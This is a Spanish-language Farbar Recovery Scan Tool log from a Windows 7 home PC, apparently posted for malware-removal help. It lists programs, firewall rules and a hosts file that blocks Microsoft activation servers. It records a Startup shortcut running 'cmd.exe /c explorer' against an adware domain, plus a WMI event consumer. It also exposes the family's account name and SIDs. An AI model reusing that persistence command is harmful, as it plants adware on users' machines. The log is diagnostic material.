Problema con Ccleaner

Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (22-04-2020 11:48:17)
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Microsoft Windows 7 Ultimate  Service Pack 1 (X86) (2016-09-12 15:27:10)
Modo de Inicio: Safe Mode (minimal)
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-1692793609-910991690-2205039242-500 - Administrator - Disabled)
Familia Landaeta (S-1-5-21-1692793609-910991690-2205039242-1000 - Administrator - Enabled) => C:\Users\Familia Landaeta
HomeGroupUser$ (S-1-5-21-1692793609-910991690-2205039242-1002 - Limited - Enabled)
Invitado (S-1-5-21-1692793609-910991690-2205039242-501 - Limited - Disabled)

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

Adobe Acrobat Reader DC - Español (HKLM\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Akamai) (Version:  - Akamai Technologies, Inc)
Cheating-Death 4.33.4 (HKLM\...\Cheating-Death) (Version:  - )
Counter-Strike 1.6 (HKLM\...\Counter-Strike 1.6_is1) (Version: Counter-Strike 1.6 No Steam - KingSOFT DVD)
Epson E-Web Print (HKLM\...\{6BF9F374-EC67-4808-A90C-F127DE6D989D}) (Version: 1.23.0000 - SEIKO EPSON CORPORATION)
EPSON L355 Series Printer Uninstall (HKLM\...\EPSON L355 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson Software Updater (HKLM\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
FIFA 14 versión 1.1 (HKLM\...\{A119D7FE-EF42-497D-A87A-C27F106E883E}_is1) (Version: 1.1 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 81.0.4044.113 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Hero Editor V0.96 (C:\Program Files\Hero Editor\) (HKLM\...\ST6UNST #2) (Version:  - )
Hero Editor V0.96 (HKLM\...\ST6UNST #1) (Version:  - )
Intel® Processor Identification Utility (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Utilidad Intel® para identificación de procesadores 6.3.0404) (Version: 6.3.0404 - Intel Corporation)
Java 8 Update 181 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
League of Legends (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Riot Game league_of_legends.live) (Version:  - Riot Games, Inc)
Microsoft .NET Framework 4.6.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML4 Parser (HKLM\...\{01501EBA-EC35-4F9F-8889-3BE346E5DA13}) (Version: 1.0.0 - Microsoft Game Studios)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Utilidad Intel® para identificación de procesadores (HKLM\...\{285B6614-95B6-4F8E-BE81-CFAE1DB22D57}) (Version: 6.3.0404 - Intel Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 4.20 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
X-Mouse Button Control 2.19 (HKLM\...\X-Mouse Button Control) (Version: 2.19 - Highresolution Enterprises)

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

CustomCLSID: HKU\S-1-5-21-1692793609-910991690-2205039242-1000_Classes\CLSID\{305CA226-D286-468e-B848-2B2E8E697B74}\Shell\Open\Command -> C:\Users\Familia Landaeta\AppData\Local\Akamai\ControlPanel.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
ShellExecuteHooks: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-08-25] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]

==================== Codecs (Lista blanca) ====================

==================== Accesos directos & WMI ========================

(Las entradas pueden ser listadas para ser restauradas o eliminadas.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/

==================== Módulos cargados (Lista blanca) =============

2016-09-12 11:32 - 2012-06-09 19:50 - 000167936 _____ (Alexander Roshal) [Archivo no firmado] C:\Program Files\WinRAR\rarext.dll
2016-09-21 11:56 - 2016-09-21 11:56 - 000097280 _____ (Microsoft Corporation) [Archivo no firmado] C:\Windows\WinSxS\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d1c738ec43578ea1\ATL80.DLL

==================== Alternate Data Streams (Lista blanca) ========

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE restricted site: HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\xnxx.com -> www.xnxx.com

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2009-07-13 22:04 - 2016-09-12 13:03 - 000000925 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 genuine.microsoft.com
127.0.0.1 mpa.one.microsoft.com
127.0.0.1 sls.microsoft.com

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: El medio no está conectado a internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

FirewallRules: [{1D304C31-0E0B-427B-A209-E245AA1DBA0E}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe Ningún archivo
FirewallRules: [TCP Query User{08E9F88E-7164-4C9B-A5E3-8425DF8A0747}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [UDP Query User{7C01576F-27B7-45E5-A1CE-685AAF5261B6}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [{F4D4EDBD-9721-405F-9C5A-4B95FD161921}] => (Allow) C:\Program Files\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{18C624E3-74F8-4BBF-B2EE-630BC42AB14A}] => (Allow) C:\Program Files\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{4C2EA450-FCEB-48E3-8469-496CA762A139}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{AC0AB0E1-512E-4FA0-AFB0-88FEAB7DBB8A}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [TCP Query User{B9206133-DE27-4228-95A7-0011F165747D}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{7A9A70EE-3D37-4554-AF4F-88827A946410}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{8A3C1318-8B40-403D-ACF7-237DA2AABC78}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [UDP Query User{C2F198D1-38BF-4B70-A00C-59073C44B99A}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [TCP Query User{BB6C1793-D505-4156-BF7C-44AA81CF0711}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [UDP Query User{E40546E9-EFB2-4C2E-9DD1-F46BA7C3EFF1}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [TCP Query User{51BC5DE6-434E-4374-927A-7C4B7F4D6E2E}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [UDP Query User{D83BA905-0A2E-4671-A098-AB513C5AF9C4}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [TCP Query User{7D14712A-D40E-4C4C-891B-7ECC745A6F20}C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [UDP Query User{E9CCF025-B6D4-49FE-8BB1-9DB454B02F51}C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [TCP Query User{30ED4585-638A-49AA-B805-1C77B86BEDDF}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{D35A1BDA-FFEB-44E9-8347-220AE6105DAC}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{1EAB70AF-D066-4767-ADCE-772024C20D56}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [UDP Query User{FB2593F0-E236-41D5-B4DC-0EF8ED94DD70}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [TCP Query User{557B22A5-A1E1-4091-9E9A-08198F3A48EB}C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{A8614DE1-4000-47ED-8AA8-B4C20CD5091F}C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{0492F1DA-2552-4AEE-B8DB-CB56494254CB}C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [UDP Query User{4696A47D-283B-43B6-88EE-31158FF5D770}C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [TCP Query User{51A1C049-CA80-46E3-B984-3CE89FF9413A}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Block) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [UDP Query User{43F840FA-25C1-4941-BB0F-9D9A51B666A0}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Block) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [TCP Query User{46EE030B-7A57-4E3F-AB8B-9F0DBB3110AC}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [UDP Query User{D653C05C-F715-45BF-BE04-7DF15D930FA2}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [{FBBEBCD5-A2F7-4A06-B4E0-1CC8755C1FE8}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{AFD82A99-09A1-40A0-AC23-23AEBAD196FE}C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe] => (Allow) C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe Ningún archivo
FirewallRules: [UDP Query User{533C26DC-9F35-4FC6-966D-68DEF983A7A8}C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe] => (Allow) C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe Ningún archivo
FirewallRules: [TCP Query User{09013516-0F08-4C86-89EC-792743B3C402}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{C5723237-617D-487F-AA6B-1051735D0E52}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [TCP Query User{6183A9D7-F63B-4886-B59E-69A31228E3BC}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_121\bin\javaw.exe Ningún archivo
FirewallRules: [UDP Query User{54AE04C6-B40D-4130-979F-B531E5C8EDDF}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_121\bin\javaw.exe Ningún archivo
FirewallRules: [TCP Query User{EB69B0BF-CEBA-4A76-A71B-5B54873F6315}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{F36ED7B7-BE13-4F27-B4D4-7AC9C3F80504}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [{460BBF5E-3754-445B-8505-5CBE6E1021D6}] => (Allow) C:\Program Files\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{E814B573-DA37-49A5-83BD-CE5E05C0DCCC}] => (Allow) C:\Program Files\Elsword\data\x2.exe Ningún archivo
FirewallRules: [TCP Query User{1696113F-1966-4FC3-B829-3B234A7FD8E6}C:\program files\java\jre1.8.0_131\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_131\bin\javaw.exe Ningún archivo
FirewallRules: [UDP Query User{F4F3BE95-61E7-4D15-840E-DCD853946D26}C:\program files\java\jre1.8.0_131\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_131\bin\javaw.exe Ningún archivo
FirewallRules: [TCP Query User{637D3EA8-C90E-4DF9-A58E-D23295AB44E9}C:\kaybo\gunz ultra\gunzrun.exe] => (Allow) C:\kaybo\gunz ultra\gunzrun.exe Ningún archivo
FirewallRules: [UDP Query User{F7CF63A3-269B-4561-86AD-C2662D9EEE05}C:\kaybo\gunz ultra\gunzrun.exe] => (Allow) C:\kaybo\gunz ultra\gunzrun.exe Ningún archivo
FirewallRules: [{E27126AC-A01E-4EA3-B035-9736657180B7}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [{7AB9F7C9-0BAF-45D6-9BE3-0CBC5A30A82D}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [TCP Query User{A3B1ADA2-95B3-438B-8E54-9E9F940CAB9D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{F5045B09-7686-438C-9E80-762ECB7B8BE7}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{AAA550EE-3077-4845-B4D5-7762BB872C3D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{D8F93572-717C-408E-BA54-9BEDE5B0303A}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{2A6E4636-3DF1-4590-9201-2899EA3D816A}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{AC5587DE-29AA-4F28-87C6-A0375B02A192}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{36CA106A-8FE5-4816-A362-11330B441CC0}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe] => (Block) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{84437487-7B69-45DE-968A-0F53DF5EBA95}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe] => (Block) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{9949CAE6-B7DA-4860-A8DC-F2109C62E003}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{BEFE0BA9-83CA-467F-A948-E40DF9FF7FF0}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{AB50A785-40D0-4058-8C6D-A4759B265D94}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{EF6E007E-7365-40BD-A4F2-7886E791BED5}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{F842DFF2-F727-437F-8F21-5AF7983A5B8D}C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe] => (Allow) C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe Ningún archivo
FirewallRules: [UDP Query User{6F5F8AB8-976F-41A2-A350-104515B0CB5B}C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe] => (Allow) C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe Ningún archivo
FirewallRules: [TCP Query User{25A2BA8A-28C5-4E9B-A6EC-0E14FA44696A}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{FC10D8A2-84A6-486E-9B44-4D429630E79C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{EC824BA9-E1C5-4845-9D9F-CEAAC0D6906D}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (Universe Gamers) [Archivo no firmado]
FirewallRules: [UDP Query User{FBFA65E9-D662-4EA6-94C8-5B65E28D736F}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (Universe Gamers) [Archivo no firmado]
FirewallRules: [TCP Query User{531C0145-8767-4816-8BE5-4C6E60C0DC16}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{411A3610-0A5E-4608-BD9C-CC136419CDAC}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{A622F54E-0B36-4531-835B-F26799ACC2F9}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{61240510-5F38-4C6A-A5EB-65A65617A4C1}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{BB08D777-19BC-4D75-B0A8-F49383F4EBC4}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{F1C0A4E3-114D-4026-9732-049EA38E069C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{1CAAE91B-4B4F-413E-BBF0-82CDA598D3DA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{47706439-E403-4C7D-9EDE-D1344A1F233C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{2A5A7E4D-7749-4A93-A1AB-EF237471FA8B}C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe] => (Allow) C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe Ningún archivo
FirewallRules: [UDP Query User{EC88AD74-D45F-4E8D-A40B-1C0CC426A16F}C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe] => (Allow) C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe Ningún archivo
FirewallRules: [TCP Query User{7F91224D-8E51-4F55-9F4D-B608B29C4924}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{EB15D02D-72EA-4DD6-ACFE-4642784E48AA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{B3269DA9-6177-4678-B55E-C9B931C1229C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{2FFF9BF0-13C8-42B3-A231-6751376620F7}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{8745764A-BC83-4F55-9171-A5982B40232C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{989FF411-E4ED-4D70-9E3C-790F16DC0BA3}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe Ningún archivo
